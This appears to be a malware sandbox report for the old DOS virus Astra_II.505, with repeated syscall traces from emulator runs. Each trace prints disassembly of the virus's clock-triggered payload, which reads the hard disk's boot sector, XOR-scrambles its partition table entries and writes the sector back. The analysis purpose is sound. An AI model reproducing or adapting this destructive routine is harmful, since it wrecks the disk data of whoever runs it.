Sample viewer

vx.netlux.org/Virus.DOS.Astra_II.505

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:39:57.46162919Z	53	PC: 12ac3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:39:57.462930279Z	2	PC: 12aec \| Character output (Char = '00')
2018-12-17T22:39:57.464918672Z	37	PC: 12b20 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:39:57.465847835Z	44	PC: 12b53 \| Get time 0x12b53: cmp cl, 0x11 0x12b56: jne 0x12b91 0x12b58: mov bx, bp 0x12b5a: add bx, 0x205 0x12b5e: mov dx, 0x80 0x12b61: mov cx, 1 0x12b64: mov ax, 0x201 0x12b67: int 0x13 0x12b69: xor si, si 0x12b6b: xor byte ptr [bx + si + 0x1c2], 0x55 0x12b70: add si, 0x10 0x12b73: cmp si, 0x40 0x12b76: jle 0x12b6b 0x12b78: mov dx, 0x80 0x12b7b: mov cx, 1 0x12b7e: mov ax, 0x301 0x12b81: int 0x13 0x12b83: mov ax, 0x1102 0x12b86: mov bl, al 0x12b88: int 0x10
2018-12-17T22:39:57.467763958Z	9	PC: 12aa2 \| Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6884,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:25.987555826Z	53	PC: 12ac3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:25.989534417Z	2	PC: 12aec \| Character output (Char = '00')
2018-12-25T12:00:25.993220752Z	37	PC: 12b20 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:25.994458887Z	44	PC: 12b53 \| Get time 0x12b53: cmp cl, 0x11 0x12b56: jne 0x12b91 0x12b58: mov bx, bp 0x12b5a: add bx, 0x205 0x12b5e: mov dx, 0x80 0x12b61: mov cx, 1 0x12b64: mov ax, 0x201 0x12b67: int 0x13 0x12b69: xor si, si 0x12b6b: xor byte ptr [bx + si + 0x1c2], 0x55 0x12b70: add si, 0x10 0x12b73: cmp si, 0x40 0x12b76: jle 0x12b6b 0x12b78: mov dx, 0x80 0x12b7b: mov cx, 1 0x12b7e: mov ax, 0x301 0x12b81: int 0x13 0x12b83: mov ax, 0x1102 0x12b86: mov bl, al 0x12b88: int 0x10
2018-12-25T12:00:25.996905716Z	9	PC: 12aa2 \| Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":17,"Second":0,"TimeBased":true,"OriginalID":6884,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:26.118858603Z	53	PC: 12ac3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:26.12123733Z	2	PC: 12aec \| Character output (Char = '00')
2018-12-25T12:00:26.123865405Z	37	PC: 12b20 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:26.125448914Z	44	PC: 12b53 \| Get time 0x12b53: cmp cl, 0x11 0x12b56: jne 0x12b91 0x12b58: mov bx, bp 0x12b5a: add bx, 0x205 0x12b5e: mov dx, 0x80 0x12b61: mov cx, 1 0x12b64: mov ax, 0x201 0x12b67: int 0x13 0x12b69: xor si, si 0x12b6b: xor byte ptr [bx + si + 0x1c2], 0x55 0x12b70: add si, 0x10 0x12b73: cmp si, 0x40 0x12b76: jle 0x12b6b 0x12b78: mov dx, 0x80 0x12b7b: mov cx, 1 0x12b7e: mov ax, 0x301 0x12b81: int 0x13 0x12b83: mov ax, 0x1102 0x12b86: mov bl, al 0x12b88: int 0x10
2018-12-25T12:00:26.528922791Z	9	PC: 12aa2 \| Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6884,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:26.24840095Z	53	PC: 12ac3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:26.249903524Z	2	PC: 12aec \| Character output (Char = '00')
2018-12-25T12:00:26.252136715Z	37	PC: 12b20 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:26.253855358Z	44	PC: 12b53 \| Get time 0x12b53: cmp cl, 0x11 0x12b56: jne 0x12b91 0x12b58: mov bx, bp 0x12b5a: add bx, 0x205 0x12b5e: mov dx, 0x80 0x12b61: mov cx, 1 0x12b64: mov ax, 0x201 0x12b67: int 0x13 0x12b69: xor si, si 0x12b6b: xor byte ptr [bx + si + 0x1c2], 0x55 0x12b70: add si, 0x10 0x12b73: cmp si, 0x40 0x12b76: jle 0x12b6b 0x12b78: mov dx, 0x80 0x12b7b: mov cx, 1 0x12b7e: mov ax, 0x301 0x12b81: int 0x13 0x12b83: mov ax, 0x1102 0x12b86: mov bl, al 0x12b88: int 0x10
2018-12-25T12:00:26.257267748Z	9	PC: 12aa2 \| Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":17,"Second":0,"TimeBased":true,"OriginalID":6884,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:26.434705553Z	53	PC: 12ac3 \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:26.437321551Z	2	PC: 12aec \| Character output (Char = '00')
2018-12-25T12:00:26.439684584Z	37	PC: 12b20 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:00:26.440890464Z	44	PC: 12b53 \| Get time 0x12b53: cmp cl, 0x11 0x12b56: jne 0x12b91 0x12b58: mov bx, bp 0x12b5a: add bx, 0x205 0x12b5e: mov dx, 0x80 0x12b61: mov cx, 1 0x12b64: mov ax, 0x201 0x12b67: int 0x13 0x12b69: xor si, si 0x12b6b: xor byte ptr [bx + si + 0x1c2], 0x55 0x12b70: add si, 0x10 0x12b73: cmp si, 0x40 0x12b76: jle 0x12b6b 0x12b78: mov dx, 0x80 0x12b7b: mov cx, 1 0x12b7e: mov ax, 0x301 0x12b81: int 0x13 0x12b83: mov ax, 0x1102 0x12b86: mov bl, al 0x12b88: int 0x10
2018-12-25T12:00:27.451737527Z	9	PC: 12aa2 \| Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')